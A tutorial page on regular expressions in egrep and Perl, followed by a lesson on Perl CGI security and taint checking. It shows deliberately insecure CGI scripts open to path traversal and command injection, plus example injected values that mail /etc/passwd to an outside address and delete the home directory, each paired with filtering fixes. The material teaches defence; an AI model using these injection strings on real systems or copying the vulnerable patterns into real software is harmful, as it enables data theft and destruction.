

Regular expressions are an incredibly powerful shorthand for searching, replacing, and matching strings. A very simple regular expression might look like:
/^andrew/
/(this|that)/
Grep is a UNIX command-line tool designed for searching files. Given a search pattern (a regular expression) and a file, grep returns all of the lines in the file that contain the search pattern. Grep can handle most regular expressions, so we're going to be using it as an introductory tool, before moving on to Perl regular expressions. We're actually using a version of grep called egrep, and here is the syntax:
egrep 'regular expression' filename
mississippi andrew dog cat john john doe missouri the quick brown fox jumps over the lazy dog. kayak
-jailshell-2.05b$ egrep 'doe' testfile john doe
-jailshell-2.05b$ egrep 'rew' testfile andrew -jailshell-2.05b$ egrep 'ss' testfile mississippi missouri
-jailshell-2.05b$ egrep '^a' testfile andrew -jailshell-2.05b$ egrep '^mi' testfile mississippi missouri -jailshell-2.05b$ egrep '^john' testfile john john doe -jailshell-2.05b$ egrep '^john$' testfile john
The period (.) character will match any single character, except the new line (\n) character. For example:
-jailshell-2.05b$ egrep 'd.g' testfile dog the quick brown fox jumps over the lazy dog. -jailshell-2.05b$ egrep '..ss.ss....' testfile mississippi
The pipe (|) character "separates alternatives 1." For example:
-jailshell-2.05b$ egrep 'andrew|john' testfile andrew john john doe
Quantifier special characters specify how many times the preceding character can match. Here is a table of quantifiers:
| Character | Description |
|---|---|
| + | The plus sign indicates that the preceding character may occur one or more times |
| ? | The question mark indicates that the preceding character may occur at most one time |
| * | The asterisk indicates that the preceding character may occur zero or more times |
| {n} | The preceding character must occur n times. |
| {n,} | The preceding character must occur at least n times. |
| {n,m} | The preceding character must occur at least n times, but not more than m times. |
And some examples:
-jailshell-2.05b$ egrep 'a.+w' testfile
andrew
-jailshell-2.05b$ egrep '^.{3}$' testfile
dog
cat
You can use parenthesis and alternation to group alternatives.
-jailshell-2.05b$ egrep '^.(o|a).$' testfile dog cat -jailshell-2.05b$ egrep '(ss|fox|doe)' testfile mississippi john doe missouri the quick brown fox jumps over the lazy dog.
-jailshell-2.05b$ egrep '(.)(.).\2\1' testfile mississippi kayak
Character classes are created with square brackets ([]). They represent a list of alternative characters and are basically shorthand for groups. The character class [abc] will match any single character if it is an a, b, or c, and is equivalent to (a|b|c). It is important not to confuse these with groups because character classes are a list of alternative characters, not words. Therefore, [andrew] matches any of the characters a, n, d, r, e, and w, not the string andrew. The carrot (^) character at the beginning of a character class means not these characters. Don't confuse it with a carrot at the beginning of the regular expression, which matches to the beginning of the line, as we saw before. Examples:
-jailshell-2.05b$ egrep '^[mispour]+$' testfile mississippi missouri -jailshell-2.05b$ egrep '^[^mispour]+$' testfile cat kayak
A nice feature of character classes is that you can use ranges. Ranges are specified with the dash (-) character, and they look like this: [a-z]. You can also combine multiple ones. This would match any alphanumeric character: [a-zA-Z0-9].
Now try these examples for yourself! Try to come up with lots of different patterns and experiment with them. I recommend that you remember to use the shell history (hit the up arrow on your keyboard) to save yourself typing.
Regular expressions in Perl are very similar to the regular expressions that we've just covered. Perl just takes them one step further. For the definitive guide to Perl regular expressions, see the perldoc perlre page.
In Perl, regular expressions can take quite a few forms, but the most common uses the =~ operator. The =~ operator performs a regular expression test on the variable to the left of the operator, using the expression to the right of the operator. In general, Perl regular expressions will be inside forward slashes (//). Here is an example:
#!/usr/bin/perl
$j = "this is my test string";
if ($j =~ /test/) {
print "Yup, it matches!";
}
$j = "My name is Andrew.";
if ($j =~ /name is (\w*)\./) {
print "Yup, it matches, and your name is $1!\n";
}
Citing from perlre:
\w Match a "word" character (alphanumeric plus "_")
\W Match a non-word character
\s Match a whitespace character
\S Match a non-whitespace character
\d Match a digit character
\D Match a non-digit character
Another common regular expression formulation in Perl looks like:
$variable =~ s/find/replace/gi;
More examples:
# Remove HTML tags (not a particularly good way to do this) $variable =~ s/\<[^\>]+\>//g; # Filter input, leaving only numbers. $shouldBeNumber =~ s/[^0-9]//g;
The following is copied from Steve Litt's Perl of Wisdom: Perl Regular Expressions:
"Perl regular expressions normally match the longest string possible. For instance:
my($text) = "mississippi"; $text =~ m/(i.*s)/; print $1 . "\n";
ississ
my($text) = "mississippi"; $text =~ m/(i.*?s)/; print $1 . "\n";
is
We've only scratched the surface of what regular expressions can do. To learn more, try these resources:
"The problem with CGI scripts is that each one presents yet another opportunity for exploitable bugs. CGI scripts should be written with the same care and attention given to Internet servers themselves, because, in fact, they are miniature servers. Unfortunately, for many Web authors, CGI scripts are their first encounter with network programming." -- w3.org Security Faq
Now that we've talked about regular expressions, we're equipped to discuss a very important issue: Perl and CGI security. Today we will cover taint checking and Perl security. In the next few lessons, we will cover other aspects of security in web publishing.
Whenever you're writing CGI scripts, it is essential that you take security into account. Maintaining good security makes it harder for someone to accidentally or maliciously gain access to your account, your server, and your data. Keep these points in mind:
Let me show you a few examples where security is an issue.
The following CGI script is not secure! Don't use it!
#!/usr/bin/perl
use CGI;
$c = new CGI;
print $c->header();
print "<html><head><title>Data lookup</title></head><body>\n";
$dataFile = "/home/acantino/datafiles/" . $c->param('file');
open(FILE, $dataFile);
@data = <FILE>;
close(FILE);
print "Data:<br>\n";
print @data;
print "</body></html>";
...
$file = $c->param('file');
$file =~ s/[\.]//g;
$dataFile = "/home/acantino/datafiles/" . $file;
open(FILE, $dataFile);
...
$file = $c->param('file');
$file =~ s/[^a-zA-Z0-9]//g;
One way to send an e-mail from Perl would look like this 2: (Again, don't actually do this!)
#!/usr/bin/perl
use CGI;
$c = new CGI;
$mail_to = $c->param('email');
print $c->header();
if ($mail_to =~ /.*?\@.*?\..*?/) {
open (MAIL,"|/usr/lib/sendmail $mail_to");
print MAIL "To: $mailto\nFrom: me@test.com\n\n";
print MAIL "This is a very insecure example e-mail!\n";
close(MAIL);
print "sent an e-mail!\n";
} else {
print "Sorry, not an e-mail address!\n";
}
junk@notreal.com; mail bhat@crackers.org < /etc/passwd;
junk@notreal.com; rm -r ~/*;
$mail_to =~ s/[^a-zA-Z0-9\.\-\_\@]//g;
To make the open command more secure, avoid pipes, explicitly use >, >>, or <, and use open with this syntax:
open(FILEHANDLE, "<", $filepath);
Besides open, you also need to be very careful when using any command that executes a shell or code. Use the following extremely carefully, and always completely filter anything coming from the Internet or user.
The following sites are excellent:
Because CGI scripts are notorious for security holes, Perl provides something called taint checking. Tainted data is data that has come from a user and has not been filtered. Taint checking is a run-time 3 process that limits where tainted data can be used.
In your CGI script, use the -T option when calling Perl. I also recommend that you redirect STDERR so that you can maintain an error log for your script.
#!/usr/bin/perl -T $errorLog = "/home/acantino/public_html/test/error"; open (STDERR, ">>$errorLog");
Any data that has come from a user will be internally marked as tainted. Any time you add tainted data to existing data, the existing data becomes tainted. Perl will exit with an error when you try to use tainted data in a function that could be potentially dangerous, such as system, backtick operators, piped open(), etc.
Because taint checking is a runtime process, a bad script will usually run, but not function properly, so you have to thoroughly test your code.
The whole point of taint checking is to make your script securely use user data. To do this, we have to untaint data with regular expressions. The only 4 way that you can untaint data is to pull out a sub-expression from your user data:
$email = $c->param('email'); # tainted
if ($email =~ m/^([a-zA-Z0-9\.\_\-\@]*)/) { # $email still tainted
$email = $1; # $email no longer tainted
} else {
print "E-mail invalid!\n";
}
Taint checking also slightly modifies the functioning of system(), require(), and use() commands. You may see something like the following:
Insecure $ENV{PATH} while running with -T switch at test.cgi line 9.
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)}; # Make %ENV safer
$ENV{'PATH'} = '/bin:/usr/bin:/usr/local/bin';
I highly recommend that you read the following page to learn more:
As a final side note, there are a few security concerns that distinguish GET and POST when used in CGI scripts.
Clearly, POST is usually better than GET. Nonetheless, neither is really secure. It's still not safe to embed raw passwords or confidential information in either GET or POST. Use cookies as session keys instead, and read the AppSec FAQ.
Spend some time playing with RegEx, grep, and Perl. Try any of the following:
Try writing a CGI script that takes data from the user and sends an e-mail message or opens a file in a secure way. Think about what we've learned and be careful. (Perhaps you should show me the script once you've written it, so we can make sure it's safe to put online.)
Read about CGI and web security at these sites:
 
[1] - http://en.wikipedia.org/wiki/Regular_expression
 
[2] - Example borrowed from http://www.extropia.com/tutorials/security/index.html
 
[3] - Here, run-time means that the Perl interpreter does taint checking as it interprets your program at run-time -- as the program is running.
 
[4] - Well, almost. The only 'good' way to untaint data!
This document was generated using AFT v5.094